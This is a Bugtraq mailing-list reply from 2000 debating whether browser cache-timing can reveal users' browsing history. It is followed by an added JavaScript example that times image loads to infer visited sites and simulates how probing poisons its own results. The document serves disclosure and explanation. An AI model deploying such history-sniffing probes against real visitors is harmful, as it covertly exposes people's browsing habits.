Bugtraq mailing list archives

Re: cache cookies?


From: "James N. Potts" <jnp () CRNET COM>
Date: Thu, 14 Dec 2000 17:49:18 -0600

Thomas Reinke wrote:
> Actually, it *does* work.  We have on our site a
> working demonstration of the exploit, showing whether or not
> you've visited one or more of more than 80 different well known
> sites.  The URL is
>
>    http://www.securityspace.com/exploit/exploit_2a.html
>
> We've found with the demo that
>
>    a) It is as reliable as the ability to find an image that
>       would be cached by the browser. In fact, the timing is
>       very accurate, but other factors can fool the mechanism.
>       Out of the 80 odd sites we tested, we had 3 false negatives.

The first time I tried your exploit, I had negatives for every site.  The
second time, I had positives for every site (as has been pointed out would
happen).

Which leads to:

>    b) Dangerous is subjective - a malicious site CAN find
>       out what sites you have visited. How much they can do
>       with it? Well..that's up to the imagination. Certainly
>       I doubt (hope?) that larger organizations wouldn't
>       stoop to this trick, but I honestly see nothing preventing
>       advertising orgs and so on from not doing this, other
>       than the uproar it would cause in the industry.

Because of the above problem, the data becomes useless.  After visiting a
malicious site once, that site can never see if you've visited anyone
since (without regularly changing the files that they look for).  Plus,
there's bound to be overlap between malicious sites; it's plausible that
within a short period of time, all users visiting malicious sites would
have positives for all overlapping sites, even though the users have never
truly visited those sites.  Since the data isn't trustworthy, why would
sites bother to look for it?

-Jim Potts
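The timing check that Reinke's demo relies on, together with the self-poisoning effect Potts describes (a probe that misses fills the cache, so the next probe of the same image is a hit), as an added example in JavaScript. This is not the securityspace.com demo's code; the site names, image URLs and the 15 ms hit threshold are assumptions for illustration. A caveat for anyone reproducing this today: modern browsers partition the HTTP cache by top-level site, so an image cached during a visit to the target site is not visible from a third-party probing page, and this technique no longer works cross-site in current browsers.

```javascript
// Added example (not the securityspace.com demo): browser cache probing by
// image load timing, plus a model of why the probe poisons its own results.
// All site names and image URLs below are assumptions for illustration.

const PROBES = [
  { site: 'site-a', image: 'https://www.site-a.test/images/logo.gif' },
  { site: 'site-b', image: 'https://www.site-b.test/images/logo.gif' },
  { site: 'site-c', image: 'https://www.site-c.test/images/logo.gif' },
];

// Assumed threshold: a cache hit completes in a few ms, a network fetch in
// tens to hundreds. Calibrate per client by timing a known-uncached URL first.
const CACHE_HIT_MS = 15;

// Classify one timing sample. Pure, so it is testable outside a browser.
function classify(elapsedMs, thresholdMs = CACHE_HIT_MS) {
  if (!(elapsedMs >= 0)) return 'unknown';      // error, timeout, or NaN
  return elapsedMs <= thresholdMs ? 'visited' : 'not-visited';
}

// Browser only: time one image load. Resolves to elapsed ms, or -1 on
// error/timeout. Nothing is rendered; the Image object is never attached.
function timeImage(url, timeoutMs = 5000) {
  return new Promise((resolve) => {
    const img = new Image();
    const start = performance.now();
    const timer = setTimeout(() => resolve(-1), timeoutMs);
    img.onload = () => { clearTimeout(timer); resolve(performance.now() - start); };
    img.onerror = () => { clearTimeout(timer); resolve(-1); };
    img.src = url;
  });
}

// Browser only: probe every site in turn and return { site: verdict }.
async function probeAll(probes = PROBES, thresholdMs = CACHE_HIT_MS) {
  const verdicts = {};
  for (const p of probes) {
    verdicts[p.site] = classify(await timeImage(p.image), thresholdMs);
  }
  return verdicts;
}

// Model of the self-poisoning problem: the cache is a set of URLs, a hit
// takes hitMs, a miss takes missMs and then fills the cache. Returns the
// verdicts of each consecutive probe run against the same client.
function simulateRuns(visitedImages, probes, runs, hitMs = 2, missMs = 180) {
  const cache = new Set(visitedImages);
  const results = [];
  for (let r = 0; r < runs; r++) {
    const verdicts = {};
    for (const p of probes) {
      const elapsed = cache.has(p.image) ? hitMs : missMs;
      verdicts[p.site] = classify(elapsed);
      cache.add(p.image);            // the probe itself caches the image
    }
    results.push(verdicts);
  }
  return results;
}

// Stand-alone run: in a browser, probe for real; elsewhere, show the model.
if (typeof Image !== 'undefined' && typeof performance !== 'undefined') {
  probeAll().then((v) => console.log(v));
} else {
  const runs = simulateRuns([PROBES[1].image], PROBES, 2);
  console.log('first run :', runs[0]);   // only site-b reported visited
  console.log('second run:', runs[1]);   // every site reported visited
}
```

Run in a browser page the block probes for real; under Node it only runs the model, which is enough to see the point: the first run reflects what the client actually had cached, and every later run (by this page or by any other page probing the same images) reports every site as visited.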
